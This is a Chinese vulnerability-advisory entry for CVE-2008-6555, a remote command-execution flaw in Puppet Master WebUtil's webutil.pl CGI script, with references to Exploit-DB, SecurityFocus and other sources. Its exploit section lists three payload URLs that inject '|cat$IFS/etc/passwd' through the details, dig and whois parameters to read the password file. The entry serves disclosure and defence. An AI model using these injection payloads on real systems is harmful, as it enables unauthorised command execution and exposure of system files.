Puppet_Master Webutil 'webutil.pl'远程dig指令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114814 漏洞类型 输入验证
发布时间 2008-03-21 更新时间 2009-03-31
CVE编号 CVE-2008-6555 CNNVD-ID CNNVD-200903-513
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/31466
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-513
|漏洞详情
WebUtil是一个简单易用的网络工具,能够通过浏览器显示如ping,traceroute,WHOIS查询,主机上线时间,日历,DNS查询,主机,Nslookup等标准网络及主机信息。PuppetMasterWebUtil中的cgi-bin/webutil.pl允许远程攻击者借助dig指令中的shell元字符,执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/28393/info

Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

These issues affect Webutil 2.3 and 2.7. 

http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd
|参考资料

来源:XF
名称:webutil-shell-command-execution(41400)
链接:http://xforce.iss.net/xforce/xfdb/41400
来源:BID
名称:28393
链接:http://www.securityfocus.com/bid/28393
来源:BUGTRAQ
名称:20080321webutil.plisstillvulnerableagainstRemoteCommandExecution.
链接:http://www.securityfocus.com/archive/1/archive/1/489961/100/0/threaded
来源:OSVDB
名称:51181
链接:http://osvdb.org/51181